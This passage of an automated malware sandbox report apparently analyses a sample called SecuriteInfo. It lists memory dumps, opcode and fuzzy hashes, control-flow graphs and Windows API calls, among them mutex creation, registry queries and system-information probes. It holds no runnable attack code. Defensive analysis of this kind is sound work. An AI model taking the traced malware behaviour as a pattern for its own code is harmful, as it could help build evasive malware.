                                                                                                      • Instruction ID: 0c9ea6f486a2ac776be53b8df4998be59f2c67318764158ba079fe94937bde3f
                                                                                                      • Opcode Fuzzy Hash: 524594d306df9b73e4ea0fc422842438a927f896b8823ec7ed206c7b66e0e208
                                                                                                      • Instruction Fuzzy Hash: 86E086301445086FCF397B18D85CD583B9EEB51390F015814F94466221CB35DD41C980
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 64c39a6fae8e2a4a6cf1b476b88cc56ce5b8297e871c9345a7f6028d495c92e4
                                                                                                      • Instruction ID: e4fe7c8f7074a655f3b7505f5890f7004faa7d6a8c618d69bdfefebf2b975cf5
                                                                                                      • Opcode Fuzzy Hash: 64c39a6fae8e2a4a6cf1b476b88cc56ce5b8297e871c9345a7f6028d495c92e4
                                                                                                      • Instruction Fuzzy Hash: E92199EF14D1207D7042C1866F68EF767AEE5D6730331C537F807D5946E2991A4EA132
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Figure: control-flow graph, first node 382 at e15d40-e15e0c; legend: Executed / Not Executed; API calls named in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey]
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7ad5f52a3581543b6fde127be6c5fe5150a530659fd149bdb814c1481e492801
                                                                                                      • Instruction ID: 878299c52bcbf52877c2baa77fba12d584bbc00bbff8136953d453587cdfb8b6
                                                                                                      • Opcode Fuzzy Hash: 7ad5f52a3581543b6fde127be6c5fe5150a530659fd149bdb814c1481e492801
                                                                                                      • Instruction Fuzzy Hash: 19B103B1A0021CABDF24DF14CC85BDEBBB9EB44304F504669E919A7281DB749AC4CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Figure: control-flow graph, first node 639 at e19675-e19695; legend: Executed / Not Executed; API calls named in the graph: Sleep, CreateMutexA]
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: cc44bd07afc31753a740106979a10b24e153119fcbeca7a4b7a04abf4a1c9efe
                                                                                                      • Instruction ID: 68cf1797e3a408a91b6054a294e27d0d34836566a1baeaa20c25a8b8654b18a1
                                                                                                      • Opcode Fuzzy Hash: cc44bd07afc31753a740106979a10b24e153119fcbeca7a4b7a04abf4a1c9efe
                                                                                                      • Instruction Fuzzy Hash: 473169717112009BEB08EF78DC997EDBB62EF86311F249218E429B73D2C7B589C08761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 670 e19547-e19560 673 e19562-e1956e 670->673 674 e1958e-e195aa 670->674 675 e19570-e1957e 673->675 676 e19584-e1958b call e2ecf8 673->676 677 e195d8-e195f7 674->677 678 e195ac-e195b8 674->678 675->676 681 e1a3e7 675->681 676->674 679 e19625-e1a3e6 call e29750 677->679 680 e195f9-e19605 677->680 683 e195ba-e195c8 678->683 684 e195ce-e195d5 call e2ecf8 678->684 686 e19607-e19615 680->686 687 e1961b-e19622 call e2ecf8 680->687 689 e1a423-e1a466 Sleep CreateMutexA 681->689 690 e1a3e7 call e482fa 681->690 683->681 683->684 684->677 686->681 686->687 687->679 690->689
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 162ac639130e84165ef1ddc2577f1ff08da91c3f34e13180131ed9bcb5f47d83
                                                                                                      • Instruction ID: 0cda4bd40f7d1f8d97a1e6e0e19ef7622719ca2a548af50da97139082771427c
                                                                                                      • Opcode Fuzzy Hash: 162ac639130e84165ef1ddc2577f1ff08da91c3f34e13180131ed9bcb5f47d83
                                                                                                      • Instruction Fuzzy Hash: 533179717052048BFB18DB68DDD93FCBB62EB85315F249218E429BB3D6C77589C08761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 700 e19a14-e19a34 704 e19a62-e19a7e 700->704 705 e19a36-e19a42 700->705 706 e19a80-e19a8c 704->706 707 e19aac-e19acb 704->707 708 e19a44-e19a52 705->708 709 e19a58-e19a5f call e2ecf8 705->709 712 e19aa2-e19aa9 call e2ecf8 706->712 713 e19a8e-e19a9c 706->713 714 e19af9-e1a3e6 call e29750 707->714 715 e19acd-e19ad9 707->715 708->709 710 e1a3fb 708->710 709->704 717 e1a423-e1a466 Sleep CreateMutexA 710->717 718 e1a3fb call e482fa 710->718 712->707 713->710 713->712 721 e19adb-e19ae9 715->721 722 e19aef-e19af6 call e2ecf8 715->722 718->717 721->710 721->722 722->714
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: b61f3e91f88894138127928628f2ea1b5889f402ef6a96e8a89c760c678dd09f
                                                                                                      • Instruction ID: 65d23297f63bc6f95fa2e76df9108332b3d8e472ccb1e2447b64b96ceedcc158
                                                                                                      • Opcode Fuzzy Hash: b61f3e91f88894138127928628f2ea1b5889f402ef6a96e8a89c760c678dd09f
                                                                                                      • Instruction Fuzzy Hash: B23187727152408BEB0CDB78DC997ECB762EF86310F24A218E468BB3D2D77589C48721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 731 e19b49-e19b69 735 e19b97-e19bb3 731->735 736 e19b6b-e19b77 731->736 739 e19be1-e19c00 735->739 740 e19bb5-e19bc1 735->740 737 e19b79-e19b87 736->737 738 e19b8d-e19b94 call e2ecf8 736->738 737->738 743 e1a400 737->743 738->735 741 e19c02-e19c0e 739->741 742 e19c2e-e1a3e6 call e29750 739->742 745 e19bc3-e19bd1 740->745 746 e19bd7-e19bde call e2ecf8 740->746 747 e19c10-e19c1e 741->747 748 e19c24-e19c2b call e2ecf8 741->748 750 e1a423-e1a466 Sleep CreateMutexA 743->750 751 e1a400 call e482fa 743->751 745->743 745->746 746->739 747->743 747->748 748->742 751->750
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 36ca87f0d41285f1d614ebe6b5ad00755319bebc2c7466d0f58f4d3af266211c
                                                                                                      • Instruction ID: 29e6850e28bc8a298d44d1406df1b65ad42885b91bfa117ed0e1fbc36ec83c2d
                                                                                                      • Opcode Fuzzy Hash: 36ca87f0d41285f1d614ebe6b5ad00755319bebc2c7466d0f58f4d3af266211c
                                                                                                      • Instruction Fuzzy Hash: F83198717052448BEB08DB78EC89BECB7A2EBC6314F349218E025B73D2C7B599C08765
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 762 e19c7e-e19c9e 766 e19ca0-e19cac 762->766 767 e19ccc-e19ce8 762->767 768 e19cc2-e19cc9 call e2ecf8 766->768 769 e19cae-e19cbc 766->769 770 e19d16-e19d35 767->770 771 e19cea-e19cf6 767->771 768->767 769->768 776 e1a405 769->776 774 e19d63-e1a3e6 call e29750 770->774 775 e19d37-e19d43 770->775 772 e19cf8-e19d06 771->772 773 e19d0c-e19d13 call e2ecf8 771->773 772->773 772->776 773->770 779 e19d45-e19d53 775->779 780 e19d59-e19d60 call e2ecf8 775->780 782 e1a423-e1a466 Sleep CreateMutexA 776->782 783 e1a405 call e482fa 776->783 779->776 779->780 780->774 783->782
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a67f787d494f4a7fd592f091f35d68f3f0889f06cfb5fe6928dfd63259bfd7f3
                                                                                                      • Instruction ID: aab3aec82cde6f16fc0bb9fe1381c3e39543632ba1198ee0dd8752b7fc04f43c
                                                                                                      • Opcode Fuzzy Hash: a67f787d494f4a7fd592f091f35d68f3f0889f06cfb5fe6928dfd63259bfd7f3
                                                                                                      • Instruction Fuzzy Hash: DF3169717012009BEB08DB78ED8D7ECFBA2EB86310F289618E465B73D2D7B589C08751
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 793 e19ee8-e19f08 797 e19f36-e19f52 793->797 798 e19f0a-e19f16 793->798 801 e19f80-e19f9f 797->801 802 e19f54-e19f60 797->802 799 e19f18-e19f26 798->799 800 e19f2c-e19f33 call e2ecf8 798->800 799->800 807 e1a40f 799->807 800->797 805 e19fa1-e19fad 801->805 806 e19fcd-e1a3e6 call e29750 801->806 803 e19f62-e19f70 802->803 804 e19f76-e19f7d call e2ecf8 802->804 803->804 803->807 804->801 810 e19fc3-e19fca call e2ecf8 805->810 811 e19faf-e19fbd 805->811 813 e1a414-e1a466 call e482fa * 3 Sleep CreateMutexA 807->813 814 e1a40f call e482fa 807->814 810->806 811->807 811->810 814->813
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: ee05d83291d170039d78470d9d652a7423702de914e85de8030bac8f888c17c7
                                                                                                      • Instruction ID: 13f09cce170604acbd8c9feadb36b84ab25c9cc74ac8caad36586f012f1ec3c1
                                                                                                      • Opcode Fuzzy Hash: ee05d83291d170039d78470d9d652a7423702de914e85de8030bac8f888c17c7
                                                                                                      • Instruction Fuzzy Hash: B6318D317011009BEB08DB78DD897FCB762EB8A310F24A218E125F77D6C7B549C18761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 830 e1a01d-e1a03d 834 e1a06b-e1a087 830->834 835 e1a03f-e1a04b 830->835 836 e1a0b5-e1a0d4 834->836 837 e1a089-e1a095 834->837 838 e1a061-e1a068 call e2ecf8 835->838 839 e1a04d-e1a05b 835->839 842 e1a102-e1a3e6 call e29750 836->842 843 e1a0d6-e1a0e2 836->843 840 e1a097-e1a0a5 837->840 841 e1a0ab-e1a0b2 call e2ecf8 837->841 838->834 839->838 844 e1a414-e1a466 call e482fa * 3 Sleep CreateMutexA 839->844 840->841 840->844 841->836 849 e1a0e4-e1a0f2 843->849 850 e1a0f8-e1a0ff call e2ecf8 843->850 849->844 849->850 850->842
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a5d6e883120590e544391db7ef6e66541910698d5afce046a7d942b4265f3f74
                                                                                                      • Instruction ID: 8e84041b3fdfe69e573e2353450e42bd61a098f0a1e153442b6c3cb3cd2a1032
                                                                                                      • Opcode Fuzzy Hash: a5d6e883120590e544391db7ef6e66541910698d5afce046a7d942b4265f3f74
                                                                                                      • Instruction Fuzzy Hash: 45316B717026009BEB08DB78DD897FDB662EF8A314F289228E425B77D2C77559C08762
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 865 e1a152-e1a172 869 e1a1a0-e1a1bc 865->869 870 e1a174-e1a180 865->870 871 e1a1ea-e1a209 869->871 872 e1a1be-e1a1ca 869->872 873 e1a182-e1a190 870->873 874 e1a196-e1a19d call e2ecf8 870->874 877 e1a237-e1a3e6 call e29750 871->877 878 e1a20b-e1a217 871->878 875 e1a1e0-e1a1e7 call e2ecf8 872->875 876 e1a1cc-e1a1da 872->876 873->874 879 e1a419-e1a466 call e482fa * 2 Sleep CreateMutexA 873->879 874->869 875->871 876->875 876->879 883 e1a219-e1a227 878->883 884 e1a22d-e1a234 call e2ecf8 878->884 883->879 883->884 884->877
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2ee021fa94046ca53de3755798767c3fd7f957435d2763a8ca03c8a09ff278e9
                                                                                                      • Instruction ID: 85732a8b8c526edef7738754be85d679356268b90fc621cdbd29eef8555ec6e3
                                                                                                      • Opcode Fuzzy Hash: 2ee021fa94046ca53de3755798767c3fd7f957435d2763a8ca03c8a09ff278e9
                                                                                                      • Instruction Fuzzy Hash: 3A314B717021409BEB08DB68DC897FDB762EB86314F289228E425B77E2C77559C0C762
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 898 e19e1f-e19e2b 899 e19e41-e19e6a call e2ecf8 898->899 900 e19e2d-e19e3b 898->900 906 e19e98-e1a3e6 call e29750 899->906 907 e19e6c-e19e78 899->907 900->899 901 e1a40a 900->901 903 e1a423-e1a466 Sleep CreateMutexA 901->903 904 e1a40a call e482fa 901->904 904->903 908 e19e7a-e19e88 907->908 909 e19e8e-e19e95 call e2ecf8 907->909 908->901 908->909 909->906
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: b71020c9e08336c1c447c76fc66415c3969a047f5ad0ab756b6c099ebdd004a6
                                                                                                      • Instruction ID: af398a861a928e8caf9495c87a3ba4d0e9206c1b799851160978231fae413355
                                                                                                      • Opcode Fuzzy Hash: b71020c9e08336c1c447c76fc66415c3969a047f5ad0ab756b6c099ebdd004a6
                                                                                                      • Instruction Fuzzy Hash: D2216A727052009BFB18DB68DC897FCB7A2FB85311F245228E529BB7D2C7B599C08751
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 918 e1a326-e1a33e 919 e1a340-e1a34c 918->919 920 e1a36c-e1a36e 918->920 923 e1a362-e1a369 call e2ecf8 919->923 924 e1a34e-e1a35c 919->924 921 e1a370-e1a377 920->921 922 e1a379-e1a381 call e178b0 920->922 927 e1a3bb-e1a3e6 call e29750 921->927 935 e1a383-e1a38b call e178b0 922->935 936 e1a3b4-e1a3b6 922->936 923->920 924->923 925 e1a41e-e1a458 call e482fa Sleep CreateMutexA 924->925 938 e1a45e-e1a466 925->938 935->936 941 e1a38d-e1a395 call e178b0 935->941 936->927 941->936 944 e1a397-e1a39f call e178b0 941->944 944->936 947 e1a3a1-e1a3a9 call e178b0 944->947 947->936 950 e1a3ab-e1a3b2 947->950 950->927
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 5fae8ded063e888859e74f4e81bcf6dec8d88d54dac4a84aad1c4d03129e0cbc
                                                                                                      • Instruction ID: d38244abbc7eb6544f87b211d120390d3b6abda681a0024f2089d2cdb05dfdb1
                                                                                                      • Opcode Fuzzy Hash: 5fae8ded063e888859e74f4e81bcf6dec8d88d54dac4a84aad1c4d03129e0cbc
                                                                                                      • Instruction Fuzzy Hash: B8215B313462019BF728AB68984F7FC76A2FB81704F2C6425E564B76D2CAB549C0C767
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E17A53
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      • Opcode ID: 188128a9dc81c8623c6e6038c5280f0bab239fca675e738c8d8f6223a16cb582
                                                                                                      • Instruction ID: 7c3a846626832d55ecd40e3c2a290398039e716f6035f3d11ab8db765dcb6a45
                                                                                                      • Opcode Fuzzy Hash: 188128a9dc81c8623c6e6038c5280f0bab239fca675e738c8d8f6223a16cb582
                                                                                                      • Instruction Fuzzy Hash: C5122671E04218DBDB14EB28DD467EE77B1AB86710F905298E4197B3C2DB304EC48B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 00E18289
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 0b58f725085642e7a17d4dfaf14c3de4d38f4070b9ac7bc55086088a16f75541
                                                                                                      • Instruction ID: be501f402f9e04e3bc0ca94a3494f198352cd6b3e5d8e6cdf12958d56e2733d7
                                                                                                      • Opcode Fuzzy Hash: 0b58f725085642e7a17d4dfaf14c3de4d38f4070b9ac7bc55086088a16f75541
                                                                                                      • Instruction Fuzzy Hash: C4C08C38022E2006ED1D09B8028C0E93300AB873A87DC3F84E1B66A0F2C93558C7D230
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 00E18289
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: e656c0bb28c2ce0cf6827633b6d4cc6b7dc349f95b9dabdc0bef8f35c0b2ad2d
                                                                                                      • Instruction ID: f3eb8215b2f5af96ca7d570ef762aa822721120a226176c733244297c099f1d3
                                                                                                      • Opcode Fuzzy Hash: e656c0bb28c2ce0cf6827633b6d4cc6b7dc349f95b9dabdc0bef8f35c0b2ad2d
                                                                                                      • Instruction Fuzzy Hash: 1AC0803401191047E91D4968524C0A53300BB4331C3E82F48D173660F1CA32C4C3C770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E1ABF8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 777de22aed09a5672f6dd6778cbf52a673a847190cebb109af4240867699c623
                                                                                                      • Instruction ID: e5a2b5ad6e3598fed35b76ba8cadc3ebff97f1db78872d139136dd485cb79af6
                                                                                                      • Opcode Fuzzy Hash: 777de22aed09a5672f6dd6778cbf52a673a847190cebb109af4240867699c623
                                                                                                      • Instruction Fuzzy Hash: 1FB11670A11268DFEB28CF14C894BEEB7B5EF49304F5041D9E809A7281D775AAC8CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8612945c60252dfa605f6cda545104d7741c92ec7acd92ac2ad39bae3029eb8b
                                                                                                      • Instruction ID: e0f93b1c3acd8f4ade734f1dd580373abe1ed79c3d360ef783770deca6471722
                                                                                                      • Opcode Fuzzy Hash: 8612945c60252dfa605f6cda545104d7741c92ec7acd92ac2ad39bae3029eb8b
                                                                                                      • Instruction Fuzzy Hash: 1C21E8EB14D120BD7142C6827F28EFB676EE5D2630331853BF407C5946E2985A4EA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
